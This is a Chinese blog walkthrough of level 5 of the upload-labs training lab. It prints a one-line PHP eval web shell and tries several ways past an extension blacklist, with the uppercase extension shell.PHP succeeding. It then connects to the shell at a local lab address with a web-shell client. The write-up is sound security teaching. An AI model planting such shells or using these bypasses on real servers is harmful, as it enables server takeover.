5.upload-labs—Pass05

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

1、上传一个shell.php

shell.php内容为:<?php @eval($_POST['123']);?>

//结果如下图所示,提示我们此文件不允许上传 img 2、扩展名黑名单绕过方法: ①、上传,shell.php.jpg //尝试是否存在apache的解析漏洞 //结果,不能解析

②、上传.htaccess //尝试,是否被过滤 //结果,被过滤

③、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾去加点 //被过滤

④、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾加空格 //被过滤

⑤、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾加::$DATA //被过滤

⑥、打开代理,启动BP,上传shell.php,对文件名的扩展名,大小写绕过 //形如:shell.PHP或者shell.PHp

如下图所示,上传成功,且上传点为:http://192.168.97.139/upload-labs/upload/ img 3、菜刀连接http://192.168.97.139/upload-labs/upload/shell.PHP即可

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/104847059
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复